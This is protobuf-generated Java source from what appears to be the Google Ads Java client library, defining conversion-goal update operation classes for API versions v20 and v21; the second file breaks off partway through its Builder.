{ updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v20.resources.CustomerConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v20.resources.CustomerConversionGoal.newBuilder((com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ public com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. 
* </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v20.resources.CustomerConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CustomerConversionGoal, com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v20.resources.CustomerConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v20.resources.CustomerConversionGoal, com.google.ads.googleads.v20.resources.CustomerConversionGoal.Builder, com.google.ads.googleads.v20.resources.CustomerConversionGoalOrBuilder>( (com.google.ads.googleads.v20.resources.CustomerConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // 
@@protoc_insertion_point(builder_scope:google.ads.googleads.v20.services.CustomerConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v20.services.CustomerConversionGoalOperation) private static final com.google.ads.googleads.v20.services.CustomerConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v20.services.CustomerConversionGoalOperation(); } public static com.google.ads.googleads.v20.services.CustomerConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CustomerConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CustomerConversionGoalOperation>() { @java.lang.Override public CustomerConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CustomerConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CustomerConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v20.services.CustomerConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/services/CampaignConversionGoalOperation.java
// Generated by the protocol buffer compiler.  DO NOT EDIT!
// source: google/ads/googleads/v21/services/campaign_conversion_goal_service.proto
// Protobuf Java Version: 3.25.7
package com.google.ads.googleads.v21.services;

/**
 * <pre>
 * A single operation (update) on a campaign conversion goal.
 * </pre>
 *
 * Protobuf type {@code google.ads.googleads.v21.services.CampaignConversionGoalOperation}
 */
public final class CampaignConversionGoalOperation extends
    com.google.protobuf.GeneratedMessageV3 implements
    // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.services.CampaignConversionGoalOperation)
    CampaignConversionGoalOperationOrBuilder {
  private static final long serialVersionUID = 0L;
  // Use CampaignConversionGoalOperation.newBuilder() to construct.
  private CampaignConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
    super(builder);
  }
  private CampaignConversionGoalOperation() {
  }

  @java.lang.Override
  @SuppressWarnings({"unused"})
  protected java.lang.Object newInstance(
      UnusedPrivateParameter unused) {
    return new CampaignConversionGoalOperation();
  }

  public static final com.google.protobuf.Descriptors.Descriptor
      getDescriptor() {
    return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_descriptor;
  }

  @java.lang.Override
  protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
      internalGetFieldAccessorTable() {
    return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_fieldAccessorTable
        .ensureFieldAccessorsInitialized(
            com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.Builder.class);
  }

  // bitField0_ bit 0 tracks presence of the optional update_mask message field.
  private int bitField0_;
  // State for the proto "operation" oneof: operationCase_ is the set field's
  // number (1 = update, 0 = unset) and operation_ holds that field's value.
  private int operationCase_ = 0;
  @SuppressWarnings("serial")
  private java.lang.Object operation_;
  public enum OperationCase
      implements com.google.protobuf.Internal.EnumLite,
          com.google.protobuf.AbstractMessage.InternalOneOfEnum {
    UPDATE(1),
    OPERATION_NOT_SET(0);
    private final int value;
    private OperationCase(int value) {
      this.value = value;
    }
    /**
     * @param value The number of the enum to look for.
     * @return The enum associated with the given number.
     * @deprecated Use {@link #forNumber(int)} instead.
     */
    @java.lang.Deprecated
    public static OperationCase valueOf(int value) {
      return forNumber(value);
    }

    public static OperationCase forNumber(int value) {
      switch (value) {
        case 1: return UPDATE;
        case 0: return OPERATION_NOT_SET;
        default: return null;
      }
    }
    public int getNumber() {
      return this.value;
    }
  };

  public OperationCase
  getOperationCase() {
    return OperationCase.forNumber(
        operationCase_);
  }

  public static final int UPDATE_MASK_FIELD_NUMBER = 2;
  private com.google.protobuf.FieldMask updateMask_;
  /**
   * <pre>
   * FieldMask that determines which resource fields are modified in an update.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   * @return Whether the updateMask field is set.
   */
  @java.lang.Override
  public boolean hasUpdateMask() {
    return ((bitField0_ & 0x00000001) != 0);
  }
  /**
   * <pre>
   * FieldMask that determines which resource fields are modified in an update.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   * @return The updateMask.
   */
  @java.lang.Override
  public com.google.protobuf.FieldMask getUpdateMask() {
    return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
  }
  /**
   * <pre>
   * FieldMask that determines which resource fields are modified in an update.
   * </pre>
   *
   * <code>.google.protobuf.FieldMask update_mask = 2;</code>
   */
  @java.lang.Override
  public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() {
    return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
  }

  public static final int UPDATE_FIELD_NUMBER = 1;
  /**
   * <pre>
   * Update operation: The customer conversion goal is expected to have a
   * valid resource name.
   * </pre>
   *
   * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
   * @return Whether the update field is set.
   */
  @java.lang.Override
  public boolean hasUpdate() {
    return operationCase_ == 1;
  }
  /**
   * <pre>
   * Update operation: The customer conversion goal is expected to have a
   * valid resource name.
   * </pre>
   *
   * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
   * @return The update.
   */
  @java.lang.Override
  public com.google.ads.googleads.v21.resources.CampaignConversionGoal getUpdate() {
    if (operationCase_ == 1) {
       return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_;
    }
    return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance();
  }
  /**
   * <pre>
   * Update operation: The customer conversion goal is expected to have a
   * valid resource name.
   * </pre>
   *
   * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
   */
  @java.lang.Override
  public com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() {
    if (operationCase_ == 1) {
       return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_;
    }
    return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance();
  }

  private byte memoizedIsInitialized = -1;
  @java.lang.Override
  public final boolean isInitialized() {
    byte isInitialized = memoizedIsInitialized;
    if (isInitialized == 1) return true;
    if (isInitialized == 0) return false;

    memoizedIsInitialized = 1;
    return true;
  }

  @java.lang.Override
  public void writeTo(com.google.protobuf.CodedOutputStream output)
                      throws java.io.IOException {
    if (operationCase_ == 1) {
      output.writeMessage(1, (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_);
    }
    if (((bitField0_ & 0x00000001) != 0)) {
      output.writeMessage(2, getUpdateMask());
    }
    getUnknownFields().writeTo(output);
  }

  @java.lang.Override
  public int getSerializedSize() {
    int size = memoizedSize;
    if (size != -1) return size;

    size = 0;
    if (operationCase_ == 1) {
      size += com.google.protobuf.CodedOutputStream
        .computeMessageSize(1, (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_);
    }
    if (((bitField0_ & 0x00000001) != 0)) {
      size += com.google.protobuf.CodedOutputStream
        .computeMessageSize(2, getUpdateMask());
    }
    size += getUnknownFields().getSerializedSize();
    memoizedSize = size;
    return size;
  }

  @java.lang.Override
  public boolean equals(final java.lang.Object obj) {
    if (obj == this) {
     return true;
    }
    if (!(obj instanceof com.google.ads.googleads.v21.services.CampaignConversionGoalOperation)) {
      return super.equals(obj);
    }
    com.google.ads.googleads.v21.services.CampaignConversionGoalOperation other = (com.google.ads.googleads.v21.services.CampaignConversionGoalOperation) obj;

    if (hasUpdateMask() != other.hasUpdateMask()) return false;
    if (hasUpdateMask()) {
      if (!getUpdateMask()
          .equals(other.getUpdateMask())) return false;
    }
    if (!getOperationCase().equals(other.getOperationCase())) return false;
    switch (operationCase_) {
      case 1:
        if (!getUpdate()
            .equals(other.getUpdate())) return false;
        break;
      case 0:
      default:
    }
    if (!getUnknownFields().equals(other.getUnknownFields())) return false;
    return true;
  }

  @java.lang.Override
  public int hashCode() {
    if (memoizedHashCode != 0) {
      return memoizedHashCode;
    }
    int hash = 41;
    hash = (19 * hash) + getDescriptor().hashCode();
    if (hasUpdateMask()) {
      hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER;
      hash = (53 * hash) + getUpdateMask().hashCode();
    }
    switch (operationCase_) {
      case 1:
        hash = (37 * hash) + UPDATE_FIELD_NUMBER;
        hash = (53 * hash) + getUpdate().hashCode();
        break;
      case 0:
      default:
    }
    hash = (29 * hash) + getUnknownFields().hashCode();
    memoizedHashCode = hash;
    return hash;
  }

  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      java.nio.ByteBuffer data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      java.nio.ByteBuffer data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      com.google.protobuf.ByteString data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      com.google.protobuf.ByteString data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(byte[] data)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      byte[] data,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws com.google.protobuf.InvalidProtocolBufferException {
    return PARSER.parseFrom(data, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(java.io.InputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      java.io.InputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseDelimitedFrom(java.io.InputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseDelimitedWithIOException(PARSER, input);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseDelimitedFrom(
      java.io.InputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseDelimitedWithIOException(PARSER, input, extensionRegistry);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      com.google.protobuf.CodedInputStream input)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input);
  }
  public static com.google.ads.googleads.v21.services.CampaignConversionGoalOperation parseFrom(
      com.google.protobuf.CodedInputStream input,
      com.google.protobuf.ExtensionRegistryLite extensionRegistry)
      throws java.io.IOException {
    return com.google.protobuf.GeneratedMessageV3
        .parseWithIOException(PARSER, input, extensionRegistry);
  }

  @java.lang.Override
  public Builder newBuilderForType() { return newBuilder(); }
  public static Builder newBuilder() {
    return DEFAULT_INSTANCE.toBuilder();
  }
  public static Builder newBuilder(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation prototype) {
    return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
  }
  @java.lang.Override
  public Builder toBuilder() {
    return this == DEFAULT_INSTANCE
        ? new Builder() : new Builder().mergeFrom(this);
  }

  @java.lang.Override
  protected Builder newBuilderForType(
      com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
    Builder builder = new Builder(parent);
    return builder;
  }
  /**
   * <pre>
   * A single operation (update) on a campaign conversion goal.
   * </pre>
   *
   * Protobuf type {@code google.ads.googleads.v21.services.CampaignConversionGoalOperation}
   */
  public static final class Builder extends
      com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements
      // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.services.CampaignConversionGoalOperation)
      com.google.ads.googleads.v21.services.CampaignConversionGoalOperationOrBuilder {
    public static final com.google.protobuf.Descriptors.Descriptor
        getDescriptor() {
      return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_descriptor;
    }

    @java.lang.Override
    protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
        internalGetFieldAccessorTable() {
      return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_fieldAccessorTable
          .ensureFieldAccessorsInitialized(
              com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.Builder.class);
    }

    // Construct using com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.newBuilder()
    private Builder() {
      maybeForceBuilderInitialization();
    }

    private Builder(
        com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
      super(parent);
      maybeForceBuilderInitialization();
    }
    private void maybeForceBuilderInitialization() {
      if (com.google.protobuf.GeneratedMessageV3
              .alwaysUseFieldBuilders) {
        getUpdateMaskFieldBuilder();
      }
    }
    @java.lang.Override
    public Builder clear() {
      super.clear();
      bitField0_ = 0;
      updateMask_ = null;
      if (updateMaskBuilder_ != null) {
        updateMaskBuilder_.dispose();
        updateMaskBuilder_ = null;
      }
      if (updateBuilder_ != null) {
        updateBuilder_.clear();
      }
      operationCase_ = 0;
      operation_ = null;
      return this;
    }

    @java.lang.Override
    public com.google.protobuf.Descriptors.Descriptor
        getDescriptorForType() {
      return com.google.ads.googleads.v21.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v21_services_CampaignConversionGoalOperation_descriptor;
    }

    @java.lang.Override
    public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation getDefaultInstanceForType() {
      return com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.getDefaultInstance();
    }

    @java.lang.Override
    public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation build() {
      com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result = buildPartial();
      if (!result.isInitialized()) {
        throw newUninitializedMessageException(result);
      }
      return result;
    }

    @java.lang.Override
    public com.google.ads.googleads.v21.services.CampaignConversionGoalOperation buildPartial() {
      com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result = new com.google.ads.googleads.v21.services.CampaignConversionGoalOperation(this);
      if (bitField0_ != 0) { buildPartial0(result); }
      buildPartialOneofs(result);
      onBuilt();
      return result;
    }

    private void buildPartial0(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result) {
      int from_bitField0_ = bitField0_;
      int to_bitField0_ = 0;
      if (((from_bitField0_ & 0x00000001) != 0)) {
        result.updateMask_ = updateMaskBuilder_ == null
            ? updateMask_
            : updateMaskBuilder_.build();
        to_bitField0_ |= 0x00000001;
      }
      result.bitField0_ |= to_bitField0_;
    }

    private void buildPartialOneofs(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation result) {
      result.operationCase_ = operationCase_;
      result.operation_ = this.operation_;
      if (operationCase_ == 1 &&
          updateBuilder_ != null) {
        result.operation_ = updateBuilder_.build();
      }
    }

    @java.lang.Override
    public Builder clone() {
      return super.clone();
    }
    @java.lang.Override
    public Builder setField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        java.lang.Object value) {
      return super.setField(field, value);
    }
    @java.lang.Override
    public Builder clearField(
        com.google.protobuf.Descriptors.FieldDescriptor field) {
      return super.clearField(field);
    }
    @java.lang.Override
    public Builder clearOneof(
        com.google.protobuf.Descriptors.OneofDescriptor oneof) {
      return super.clearOneof(oneof);
    }
    @java.lang.Override
    public Builder setRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        int index, java.lang.Object value) {
      return super.setRepeatedField(field, index, value);
    }
    @java.lang.Override
    public Builder addRepeatedField(
        com.google.protobuf.Descriptors.FieldDescriptor field,
        java.lang.Object value) {
      return super.addRepeatedField(field, value);
    }
    @java.lang.Override
    public Builder mergeFrom(com.google.protobuf.Message other) {
      if (other instanceof com.google.ads.googleads.v21.services.CampaignConversionGoalOperation) {
        return mergeFrom((com.google.ads.googleads.v21.services.CampaignConversionGoalOperation)other);
      } else {
        super.mergeFrom(other);
        return this;
      }
    }

    public Builder mergeFrom(com.google.ads.googleads.v21.services.CampaignConversionGoalOperation other) {
      if (other == com.google.ads.googleads.v21.services.CampaignConversionGoalOperation.getDefaultInstance()) return this;
      if (other.hasUpdateMask()) {
        mergeUpdateMask(other.getUpdateMask());
      }
      switch (other.getOperationCase()) {
        case UPDATE: {
          mergeUpdate(other.getUpdate());
          break;
        }
        case OPERATION_NOT_SET: {
          break;
        }
      }
      this.mergeUnknownFields(other.getUnknownFields());
      onChanged();
      return this;
    }

    @java.lang.Override
    public final boolean isInitialized() {
      return true;
    }

    @java.lang.Override
    public Builder mergeFrom(
        com.google.protobuf.CodedInputStream input,
        com.google.protobuf.ExtensionRegistryLite extensionRegistry)
        throws java.io.IOException {
      if (extensionRegistry == null) {
        throw new java.lang.NullPointerException();
      }
      try {
        boolean done = false;
        while (!done) {
          int tag = input.readTag();
          switch (tag) {
            case 0:
              done = true;
              break;
            case 10: {
              input.readMessage(
                  getUpdateFieldBuilder().getBuilder(),
                  extensionRegistry);
              operationCase_ = 1;
              break;
            } // case 10
            case 18: {
              input.readMessage(
                  getUpdateMaskFieldBuilder().getBuilder(),
                  extensionRegistry);
              bitField0_ |= 0x00000001;
              break;
            } // case 18
            default: {
              if (!super.parseUnknownField(input, extensionRegistry, tag)) {
                done = true; // was an endgroup tag
              }
              break;
            } // default:
          } // switch (tag)
        } // while (!done)
      } catch (com.google.protobuf.InvalidProtocolBufferException e) {
        throw e.unwrapIOException();
      } finally {
        onChanged();
      } // finally
      return this;
    }
    private int operationCase_ = 0;
    private java.lang.Object operation_;
    public OperationCase
        getOperationCase() {
      return OperationCase.forNumber(
          operationCase_);
    }

    public Builder clearOperation() {
      operationCase_ = 0;
      operation_ = null;
      onChanged();
      return this;
    }

    private int bitField0_;

    private com.google.protobuf.FieldMask updateMask_;
    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_;
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     * @return Whether the updateMask field is set.
     */
    public boolean hasUpdateMask() {
      return ((bitField0_ & 0x00000001) != 0);
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     * @return The updateMask.
     */
    public com.google.protobuf.FieldMask getUpdateMask() {
      if (updateMaskBuilder_ == null) {
        return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
      } else {
        return updateMaskBuilder_.getMessage();
      }
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder setUpdateMask(com.google.protobuf.FieldMask value) {
      if (updateMaskBuilder_ == null) {
        if (value == null) {
          throw new NullPointerException();
        }
        updateMask_ = value;
      } else {
        updateMaskBuilder_.setMessage(value);
      }
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder setUpdateMask(
        com.google.protobuf.FieldMask.Builder builderForValue) {
      if (updateMaskBuilder_ == null) {
        updateMask_ = builderForValue.build();
      } else {
        updateMaskBuilder_.setMessage(builderForValue.build());
      }
      bitField0_ |= 0x00000001;
      onChanged();
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) {
      if (updateMaskBuilder_ == null) {
        if (((bitField0_ & 0x00000001) != 0) &&
          updateMask_ != null &&
          updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) {
          getUpdateMaskBuilder().mergeFrom(value);
        } else {
          updateMask_ = value;
        }
      } else {
        updateMaskBuilder_.mergeFrom(value);
      }
      if (updateMask_ != null) {
        bitField0_ |= 0x00000001;
        onChanged();
      }
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public Builder clearUpdateMask() {
      bitField0_ = (bitField0_ & ~0x00000001);
      updateMask_ = null;
      if (updateMaskBuilder_ != null) {
        updateMaskBuilder_.dispose();
        updateMaskBuilder_ = null;
      }
      onChanged();
      return this;
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() {
      bitField0_ |= 0x00000001;
      onChanged();
      return getUpdateMaskFieldBuilder().getBuilder();
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() {
      if (updateMaskBuilder_ != null) {
        return updateMaskBuilder_.getMessageOrBuilder();
      } else {
        return updateMask_ == null ?
            com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_;
      }
    }
    /**
     * <pre>
     * FieldMask that determines which resource fields are modified in an update.
     * </pre>
     *
     * <code>.google.protobuf.FieldMask update_mask = 2;</code>
     */
    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>
        getUpdateMaskFieldBuilder() {
      if (updateMaskBuilder_ == null) {
        updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3<
            com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>(
                getUpdateMask(),
                getParentForChildren(),
                isClean());
        updateMask_ = null;
      }
      return updateMaskBuilder_;
    }

    private com.google.protobuf.SingleFieldBuilderV3<
        com.google.ads.googleads.v21.resources.CampaignConversionGoal, com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v21.resources.CampaignConversionGoalOrBuilder> updateBuilder_;
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     * @return Whether the update field is set.
     */
    @java.lang.Override
    public boolean hasUpdate() {
      return operationCase_ == 1;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     * @return The update.
     */
    @java.lang.Override
    public com.google.ads.googleads.v21.resources.CampaignConversionGoal getUpdate() {
      if (updateBuilder_ == null) {
        if (operationCase_ == 1) {
          return (com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_;
        }
        return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance();
      } else {
        if (operationCase_ == 1) {
          return updateBuilder_.getMessage();
        }
        return com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance();
      }
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    public Builder setUpdate(com.google.ads.googleads.v21.resources.CampaignConversionGoal value) {
      if (updateBuilder_ == null) {
        if (value == null) {
          throw new NullPointerException();
        }
        operation_ = value;
        onChanged();
      } else {
        updateBuilder_.setMessage(value);
      }
      operationCase_ = 1;
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    public Builder setUpdate(
        com.google.ads.googleads.v21.resources.CampaignConversionGoal.Builder builderForValue) {
      if (updateBuilder_ == null) {
        operation_ = builderForValue.build();
        onChanged();
      } else {
        updateBuilder_.setMessage(builderForValue.build());
      }
      operationCase_ = 1;
      return this;
    }
    /**
     * <pre>
     * Update operation: The customer conversion goal is expected to have a
     * valid resource name.
     * </pre>
     *
     * <code>.google.ads.googleads.v21.resources.CampaignConversionGoal update = 1;</code>
     */
    public Builder mergeUpdate(com.google.ads.googleads.v21.resources.CampaignConversionGoal value) {
      if (updateBuilder_ == null) {
        if (operationCase_ == 1 &&
            operation_ != com.google.ads.googleads.v21.resources.CampaignConversionGoal.getDefaultInstance()) {
          operation_ = com.google.ads.googleads.v21.resources.CampaignConversionGoal.newBuilder((com.google.ads.googleads.v21.resources.CampaignConversionGoal) operation_)
              .mergeFrom(value).buildPartial();
        } else {
          operation_ = value;
        }
        onChanged();
      } else {
        if (operationCase_ == 1) {
          updateBuilder_.mergeFrom(value);
        } else {
          updateBuilder_.setMessage(value);
